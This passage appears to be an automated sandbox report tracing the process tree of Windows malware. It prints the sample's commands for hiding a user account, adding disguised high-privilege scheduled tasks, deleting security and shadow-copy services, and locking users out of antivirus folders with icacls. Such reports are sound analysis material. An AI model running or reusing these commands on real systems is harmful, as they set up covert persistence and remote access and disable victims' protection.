        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        9⤵
        
        PID:5184
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        10⤵
        
        PID:5204
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        9⤵
        Views/modifies file attributes
        
        PID:5224
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        9⤵
        Views/modifies file attributes
        
        PID:5244
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        9⤵
        Views/modifies file attributes
        
        PID:5264
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:1504
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
      4⤵
      Drops file in Drivers directory
      PID:204
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:4256
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:4904
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:644
  - - C:\ProgramData\WindowsTask\update.exe
      C:\ProgramData\WindowsTask\update.exe
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:2160
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:4524
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:4576
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:2316
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:2980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appidsvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4644
- - C:\Windows\SysWOW64\sc.exe
    sc start appidsvc
    3⤵
    PID:4732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appmgmt
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:212
- - C:\Windows\SysWOW64\sc.exe
    sc start appmgmt
    3⤵
    PID:2476
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
  2⤵
  PID:2716
- - C:\Windows\SysWOW64\sc.exe
    sc config appidsvc start= auto
    3⤵
    PID:4764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
  2⤵
  PID:2256
- - C:\Windows\SysWOW64\sc.exe
    sc config appmgmt start= auto
    3⤵
    PID:1160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:2096
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    PID:4192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop mbamservice
  2⤵
  PID:372
- - C:\Windows\SysWOW64\sc.exe
    sc stop mbamservice
    3⤵
    PID:2180
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  2⤵
  PID:3840
- - C:\Windows\SysWOW64\sc.exe
    sc stop bytefenceservice
    3⤵
    PID:4188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  2⤵
  PID:4000
- - C:\Windows\SysWOW64\sc.exe
    sc delete bytefenceservice
    3⤵
    PID:912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete mbamservice
  2⤵
  PID:3924
- - C:\Windows\SysWOW64\sc.exe
    sc delete mbamservice
    3⤵
    PID:3684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete crmsvc
  2⤵
  PID:1116
- - C:\Windows\SysWOW64\sc.exe
    sc delete crmsvc
    3⤵
    PID:1776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
  2⤵
  PID:1120
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    PID:1728
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
  2⤵
  PID:1292
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    PID:1584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
  2⤵
  PID:4088
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    PID:4500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
  2⤵
  PID:2412
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    PID:2420
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
  2⤵
  PID:3872
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    PID:2864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3016
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
  2⤵
  PID:2592
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:936
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
  2⤵
  PID:2244
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2872
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
  2⤵
  PID:4180
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1424
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
  2⤵
  PID:4312
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3852
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
  2⤵
  PID:4172
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3848
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
  2⤵
  PID:1180
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
  2⤵
  PID:1536
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:4048
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
  2⤵
  PID:1316
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:2588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
  2⤵
  PID:1596
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:3644
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
  2⤵
  PID:4892
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:2372
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4760
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
  2⤵
  PID:1528
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4776
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4744
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2108
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  2⤵
  PID:4196
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2348
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4260
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:420
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:612
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4056
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1364
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2808
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4304
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1760
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1712
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2428
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4888
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4480
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2156
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2248
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:192
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4080
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3700
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3408
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:2788
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4412
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  2⤵
  PID:3708
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4520
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:2852
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2416
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:4536
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3908
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4060
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3688
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:476
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1780
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3328
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4064
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2596
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1372
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4540
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4832
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:4900
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4200
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:3320
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3360
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1156
- C:\Programdata\Install\utorrent.exe
  C:\Programdata\Install\utorrent.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - NTFS ADS
  PID:4352
- - C:\ProgramData\WindowsTask\azur.exe
    C:\ProgramData\WindowsTask\azur.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    PID:3404
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"
      4⤵
      PID:4052
    - - C:\Windows\SysWOW64\timeout.exe
        
        C:\Windows\system32\timeout.exe 3
        5⤵
        Delays execution with timeout.exe
        
        PID:1988
- - C:\ProgramData\WindowsTask\system.exe
    C:\ProgramData\WindowsTask\system.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\selfDel.bat" "
      4⤵
      PID:5444
- - C:\ProgramData\RDPWinst.exe
    C:\ProgramData\RDPWinst.exe -u
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:944

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4476

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s TermService
1⤵
PID:4616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1288

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4952

C:\Programdata\RealtekHD\taskhost.exe
C:\Programdata\RealtekHD\taskhost.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
PID:4176
- C:\Programdata\WindowsTask\winlogon.exe
  C:\Programdata\WindowsTask\winlogon.exe
  2⤵
  - Executes dropped EXE
  PID:5324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /C schtasks /query /fo list
    3⤵
